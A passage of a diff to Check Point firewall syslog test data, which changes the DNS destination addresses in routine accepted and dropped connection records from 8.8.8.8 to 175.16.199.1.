FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56200"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46980"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.140.246"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57656"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:15Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a7,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504935"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53745"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50520"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57384"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56288"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504937"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57384"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e2a9,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58782"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2ba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52251"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:02:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e2ba,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35694"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10159"; xlatesrc:"0.0.0.0"] 
@@ -3580,8 +3580,8 @@
 <134>1 2020-03-29T18:06:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e389,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e38b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:17Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e39b,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
-<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33661"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40117"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505185"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33661"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:06:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e3a1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58784"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:06:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e3ab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40404"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:06:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e3ab,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35792"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10171"; xlatesrc:"0.0.0.0"] 
@@ -3631,63 +3631,63 @@
 <134>1 2020-03-29T18:11:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e4de,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44553"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:11:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e4e6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54220"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:11:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e4e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585505541"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:12:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e505,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585505541"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40192"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
